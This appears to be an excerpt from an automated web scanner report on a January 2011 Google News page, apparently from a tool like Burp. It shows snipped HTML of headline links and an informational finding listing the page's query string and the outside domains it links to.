<div class="aa-inner"><a href="http://www.thestreet.com/story/10982553/1/tax-preparation-halliburton-hot-trends.html?cm_ven=GOOGLEN" target="_blank" class="usg-AFQjCNEjjwBXv_sJbLEN9ftV5HG1BzLX7g " id="MAA4AEgKUAJgAmoCdXM">McRib, Smurfit-Stone: Hot Trends</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF7GHQ7EiaH4U94pZ0LQb_hOwaJjA " href="http://www.marketwatch.com/story/rocktenn-to-buy-smurfit-stone-for-35-billion-2011-01-24" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF8KU8lwacw5bgjcA_PplD4ky7CcA " href="http://www.missourinet.com/2011/01/24/st-louis-based-smurfit-stone-sells-for-3-5b/" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEoA064sb9NXd1pqBHc47dzM2oIJw " href="http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/0fcME5GA0IOcZM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNElKv0GNcBZgzUQCULJE3OQ6oz6jw " href="http://online.wsj.com/article/SB10001424052748704279704576102242255911216.html?mod=googlenews_wsj" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Id_W6wgEIGo">Video:&nbsp;
Palestine Papers spark fury in Ramallah
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/jan/24/papers-palestinian-leaders-refugees-fight" target="_blank" class="usg-AFQjCNGGya3F-AttIyCGzX9tofIwFV9hxA " id="MAA4AEgLUAFgAmoCdXM">Papers reveal how Palestinian leaders gave up fight over refugees</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEaadv9eEgCosx3Fx9YrK8VmjQUUA " href="http://www.jpost.com/MiddleEast/Article.aspx?id=205065" id="MAA4AEgLUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNECRhzSqEJbRN9fKfxZ08aW9SDk8A " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12270504" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoZJ4kqbRh3uXH99xaN2e36i18eg " href="http://english.aljazeera.net/palestinepapers/2011/01/201112412224387862.html" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEV93objFvHJXFeDa0meWiOJcehyw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_1" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw " title="Fox News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/mwTGtKZ4NInPwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFDfn7oAgiO1bwSefFQwDxUfjYx7w " href="http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://health.usnews.com/health-news/family-health/heart/articles/2011/01/24/lowering-bp-can-help-cut-womens-heart-disease-risk.html" target="_blank" class="usg-AFQjCNGMewBDUXKRrXbz9dDPgk2CfatYqg " id="MAA4AEgMUAFgAmoCdXM">Lowering BP Can Help Cut Women&#39;s Heart Disease Risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " id="MAA4AEgMUAJgAmoCdXM">U.S. Heart Disease Costs Expected to Soar</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3XToTSrtKhlkI7xZ-Y6ypAF1H4g " href="http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEShwCjRPP3o8B9Bknfl-uNzkHnTg " href="http://www.bloomberg.com/news/2011-01-24/heart-disease-treatment-cost-to-triple-to-818-billion-by-2030-group-says.html" id="MAA4AEgMUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcfD1knVticOCLd49-9hkVxr9FiA " href="http://ozarksfirst.com/fulltext?nxd_id=391716" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHbJTmNGEga0s_5dekJF3wI_kJcFw " href="http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html" id="MAA4AEgMUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA " title="Globe and Mail"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/8VFR3JrwXIVmeM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEceaM8GMTGP7YZHD2H7DN0PklU7g " href="http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1311662&amp;srvc=rss" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316" target="_blank" class="usg-AFQjCNFXDwzIsfpbYW4xLUwi4UyNPddplA " id="MAA4AEgNUAFgAmoCdXM">Brady unanimous choice as AP All-Pro</a>
...[SNIP]...
<div class="aa-inner"><a href="http://musketfire.com/2011/01/24/three-patriots-make-the-all-pro-team/" target="_blank" class="usg-AFQjCNGS3y2ZauZ7IEGNf6kOGpRFYvxByw " id="MAA4AEgNUAJgAmoCdXM">Three Patriots Make the All-Pro Team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFtVmCzgJetNQA3YuO6D6T2xCsrGQ " href="http://www.boston.com/sports/football/patriots/extra_points/2011/01/tom_brady_unani.html" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDZvJMjOxvPGWf0GTtpiYowmX3nw " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/brady-mayo-mankins-named-all-pro/" id="MAA4AEgNUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHvwv1Cu4OL92x3XwJPQZYjdPrTWQ " href="http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&amp;id=1163&amp;line=199317&amp;spln=1" id="MAA4AEgNUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/w_tEYbzpZ15crM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHS5uJx4olbyF9osDF3gTDGuyuCPg " href="http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3i4eR4POFOw">Video:&nbsp;
Detroit rape suspect to be arraigned on several assault counts.
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.detnews.com/article/20110124/METRO01/101240374/1409/metro/Detroit-rape-suspect--31--has-spent-almost-half-his-life-in-prison" target="_blank" class="usg-AFQjCNHDjiKWPniNGy7SY6MsW0KH4Ih34Q " id="MAA4AEgOUAFgAmoCdXM">Detroit rape suspect, 31, has spent almost half his life in prison</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEalDUBH8-HQVONhcKZ4MW2d5rlSw " href="http://www.freep.com/article/20110124/NEWS05/101240382/1007/news05/4-officers-shot-gunman-dead-in-horrifying-attack" id="MAA4AEgOUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCCEQVPyyjZin-IgS-GZbKQg96lw " href="http://www.cnn.com/2011/CRIME/01/24/michigan.rape.suspect/?hpt=T2" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFr6r5QBoathNzT09PJwnvBUwlkuA " href="http://www.nytimes.com/2011/01/24/us/24detroit.html?src=twrhp" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/packers-headed-to-super-bowl/article1880207/" class="usg-AFQjCNHIiFUxa3AEXZn1vUtKyl5UV-ph3A " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/E4wG-9FiV5eTAM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/packers-headed-to-super-bowl/article1880207/" class="usg-AFQjCNHIiFUxa3AEXZn1vUtKyl5UV-ph3A "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFGDQxlf2HkP_kY_tNzY5iMi_-1RQ " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=6_dUkNdoPZI">Video:&nbsp;
Raw Video: Packers Fans Rejoice in NFC Title
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl" target="_blank" class="usg-AFQjCNGQElfXImuP5gjNiO4sKtARSBFJYA " id="MAA4AEgPUAFgAmoCdXM">Roethlisberger, Rodgers look to bounce back in Super Bowl</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPpTk4ieUXgu-P8RRRMf8MWo7J0w " href="http://www.nfl.com/news/story/09000d5d81de4791/article/steelers-packers-provide-plan-for-others-to-find-success" id="MAA4AEgPUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGPrr0vkoRqaEiQt3vFQA_4L6QnyA " href="http://www.chron.com/disp/story.mpl/ap/tx/7395456.html" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHJIPZyVcw6wNepnm-LyDHFaO6Clg " href="http://profootballtalk.nbcsports.com/2011/01/24/packers-fans-not-happy-with-treatment-in-chicago/" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHhneFPmAPUa6G6iZ-Yzxn3ptkaaw " href="http://www.jsonline.com/news/milwaukee/114509574.html" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg " title="ABC News"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/4qo0wQiEBATaaM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg "> ABC News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHD9gmMcX5UbuSNEialO4A3C839Zg " href="http://online.wsj.com/article/BT-CO-20110124-713737.html" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html" target="_blank" class="usg-AFQjCNGdoU1Lh67pcIeV49PyT7DoCZ4pRg " id="MAA4AEgQUAJgAmoCdXM">Cantor declares state bankruptcy law DOA</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFsJ-xmO_ejoSJAqbQS-S39fJbZpg " href="http://www.reuters.com/article/idUSN2419775920110124" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhzLhkbOVz53QHJ6bmW7YycCP-lA " href="http://latimesblogs.latimes.com/money_co/2011/01/eric-cantor-states-bankruptcy-bailouts-house-majority-leader-gingrich.html" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYGF2tFrtqpMAo1sUiv4XCv4MgNA " href="http://tpmdc.talkingpointsmemo.com/2011/01/republicans-in-a-fix-on-infrastructure-spending.php" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVSFWw5bW8lOlkPcETmuGH7fJddA " href="http://voices.washingtonpost.com/44/2011/01/eric-cantor-president-obama-wa.html" id="MAA4AEgQUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N4VB20110124" class="usg-AFQjCNGObH-rlW5oa-v0qUrmayFvL9u0zg " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/PTWrrKWFPhkNhM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N4VB20110124" class="usg-AFQjCNGObH-rlW5oa-v0qUrmayFvL9u0zg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG6qrigwK0jGaJWzKxvUijw-g-xcA " href="http://sports.espn.go.com/new-york/nfl/news/story?id=6054732&amp;campaign=rss&amp;source=NFLHeadlines" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video:&nbsp;
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/rex-ryan-jets-have-done-a-pretty-good-job-of-beating-patriots/" target="_blank" class="usg-AFQjCNEl1IHYaTs16CTlgmfI4z1L2yr4yg " id="MAA4AEgRUAFgAmoCdXM">Rex Ryan: Jets have &#39;done a pretty good job&#39; of beating Patriots</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHfEBCN-dtPvPOTD0kDPV0P8d3Q1Q " href="http://online.wsj.com/article/APa59ba6dc9ce0453e8a616202c7484b68.html" id="MAA4AEgRUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2AZEXbdt5AYsMtu8msDEkOt-3Fw " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1" id="MAA4AEgRUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFLYIutFWp_mZm9Ukmjx0jnqY1qmQ " href="http://www.ajc.com/sports/jets-qb-sanchez-optimistic-814203.html" id="MAA4AEgRUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/PxjjM3Orb87AzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG3JzDql7WAkcCHRYSnsAbbGadxAg " href="http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html" target="_blank" class="usg-AFQjCNH8xyRSjagQTe7qcKbQ1RxMrRntiw " id="MAA4AEgSUAFgAmoCdXM">US backs ban on Ivory Coast cocoa imports</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-24/summary-box-ivory-coast-might-ban-cocoa-exports.html" target="_blank" class="usg-AFQjCNFvQyMenWhWCi8Scnr2HQOzz1Myqw " id="MAA4AEgSUAJgAmoCdXM">Summary Box: Ivory Coast might ban cocoa exports</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8w5-3wv-Joef82tAEi3WkRMlKBg " href="http://abcnews.go.com/Business/wireStory?id=12751095" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGEkYfaKL41vivSMDYuj5cNE_tgpw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_3" id="MAA4AEgSUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHt7HNh28TuTa201PSzxavp-qCB9w " href="http://www.reuters.com/article/idUSTRE70N66I20110124" id="MAA4AEgSUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/M2eWhkFHXWq5TM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ "> Reuters </a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376180,00.asp" target="_blank" class="usg-AFQjCNEeedKNUlqWQgoNsXULz0osRTWeaQ " id="MAA4AEgTUAFgAmoCdXM">Twitter&#39;s Ad Revenue Predicted to Pass MySpace</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.emarketer.com/Article.aspx?R=1008192" target="_blank" class="usg-AFQjCNFHIkw8yyxLm5eiE9NU2pbWrOnIXQ " id="MAA4AEgTUAJgAmoCdXM">Twitter Ad Revenues to Soar This Year</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " href="http://www.reuters.com/article/idUSTRE70N5P220110124" id="MAA4AEgTUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZO8otCjpSj5AP5vwSF4Llgt--JA " href="http://www.bloomberg.com/news/2011-01-24/twitter-s-advertising-revenue-may-triple-to-150-million-emarketer-says.html" id="MAA4AEgTUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHEmKzfFERxkTqgK7-nDAlnLBvvlg " href="http://www.digitaltrends.com/computing/twitter-advertising-revenue-swiftly-challenging-myspace/" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGVukQYF2CS02hBDpoVNsgSl2Vhrg " href="http://business.newsfactor.com/story.xhtml?story_id=12000005I4S0" id="MAA4AEgTUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1" class="usg-AFQjCNEQHKiw9TKQgRYUmMwzm3YZzn7Z0g " title="USA Today"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/_lRM2j82QTbMDM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1" class="usg-AFQjCNEQHKiw9TKQgRYUmMwzm3YZzn7Z0g "> USA Today </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGAfsCM8qVY21SNmrGDm9XDV7AnAg " href="http://www.csmonitor.com/USA/Politics/The-Vote/2011/0124/Scalia-addresses-Tea-Party-Caucus-but-should-he" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.cbsnews.com/8301-503544_162-20029369-503544.html" target="_blank" class="usg-AFQjCNH9dvJ6QMshI9GB-37Wn9ge8VjujA " id="MAA4AEgUUAFgAmoCdXM">Scalia Lectures Lawmakers - Behind Closed Doors</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.politico.com/news/stories/0111/48043.html" target="_blank" class="usg-AFQjCNHS1xbvITXJO9BTabNhSXTloex_3A " id="MAA4AEgUUAJgAmoCdXM">Tea time for Antonin Scalia</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFuFRTvug7VlSqLII_mmBygDvrNnQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/21/AR2011012106553.html" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHFjYfu7P8THOH4gtZWKzOYxjSmkg " href="http://www.cnn.com/2011/US/01/21/scotus.scalia.tea.party/" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHNIlI2w06i8a1hNzLJ7zkDAMDlTw " href="http://www.bloomberg.com/news/2011-01-24/bachmann-s-tea-party-caucus-to-host-high-court-justice-scalia.html" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEQHKiw9TKQgRYUmMwzm3YZzn7Z0g " href="http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1" id="MAA4AEgUUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says" class="usg-AFQjCNHVkBCpHSqCvo6_iJ3QeAte9R4HtQ " title="Computerworld"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/daFSu9xUqylQ5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says" class="usg-AFQjCNHVkBCpHSqCvo6_iJ3QeAte9R4HtQ "> Computerwor... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHN9PKHYEKTa2KbqrEgQddEwTWgIw " href="http://techland.time.com/2011/01/24/motorola-xoom-tablet-tipped-for-february-17-release-at-700/" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376161,00.asp" target="_blank" class="usg-AFQjCNGKiHjC_kakoEG8A44FhwtCe2AHAg " id="MAA4AEgVUAFgAmoCdXM">Reports: Motorola Xoom to Cost About the Same as 32GB iPad</a>
...[SNIP]...

20.107. http://news.google.com/news/story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/story

Issue detail

The page was loaded from a URL containing a query string:
  • http://news.google.com/news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddMP3JjJDFIJRJIMQcYiNzx8PKdjKM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d11\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQqgIwCg\\x22\\x3e38
The response contains the following links to other domains:
  • http://www.registerguard.com/csp/cms/sites/web/news/cityregion/25811732-57/police-waldport-monday-miranda-durham.csp
  • http://www.reuters.com/article/idUSLDE70O14P20110125
  • http://www.reuters.com/article/idUSN2416456020110124
  • http://www.reuters.com/article/idUSN2525117520110125
  • http://www.reuters.com/article/idUSN2525409520110125
  • http://www.reuters.com/article/idUSTRE70M0EM20110125
  • http://www.reuters.com/article/idUSTRE70N2DK20110125
  • http://www.reuters.com/article/idUSTRE70N2TQ20110124
  • http://www.reuters.com/article/idUSTRE70N73S20110124
  • http://www.reuters.com/article/idUSTRE70O04520110125?feedType=RSS&feedName=domesticNews
  • http://www.reuters.com/article/idUSTRE70O1MV20110125
  • http://www.rttnews.com/Content/USCommentary.aspx?Id=1534946&SM=1
  • http://www.seattlepi.com/local/6420ap_or_oregon_officer_shot.html
  • http://www.siliconrepublic.com/digital-life/item/20087-iphone-5-and-ipad-2-may-use
  • http://www.sltrib.com/sltrib/money/51114328-79/dow-percent-shares-12000.html.csp
  • http://www.star-telegram.com/2011/01/24/2793479/jerry-jones-switches-focus-to.html
  • http://www.straitstimes.com/BreakingNews/TechandScience/Story/STIStory_627942.html
  • http://www.switched.com/2011/01/25/google-mozilla-adding-new-do-not-track-features-to-browsers/
  • http://www.techtree.com/India/News/Mozilla_to_Add_Do-not-track_Feature_to_Firefox/551-114274-643.html
  • http://www.techtree.com/India/News/Next_iPhone_iPad_will_let_You_Make_Purchases/551-114271-893.html
  • http://www.telegraph.co.uk/technology/apple/8278278/Apples-App-store-hits-10-billionth-download.html
  • http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-deadly-arizona-shooting/article1881169/
  • http://www.thestreet.com/story/10983901/1/stock-futures-jan-25.html?cm_ven=GOOGLEN
  • http://www.tmz.com/2011/01/24/skins-schick-mtv-commercial-pulled-ptc/
  • http://www.tvfanatic.com/2011/01/skins-review-tea/
  • http://www.usatoday.com/life/movies/movieawards/oscars/2011-01-25-oscar-nominations-preview_N.htm
  • http://www.usatoday.com/travel/destinations/2011-01-20-dominican-republic-cheap-resort_N.htm
  • http://www.usatoday.com/yourlife/food/diet-nutrition/2011-01-25-foodfight25_ST_N.htm
  • http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html
  • http://www.voanews.com/english/news/africa/AU-Chief-in-Ivory-Coast-for-Talks-with-Rival-Leaders-114558329.html
  • http://www.voanews.com/english/news/asia/Philippines-Bus-Blast-Kills-2-114536154.html
  • http://www.voanews.com/english/news/middle-east/Hariri-Supporters-Gather-for-Day-of-Rage-in-Lebanon--114537104.html
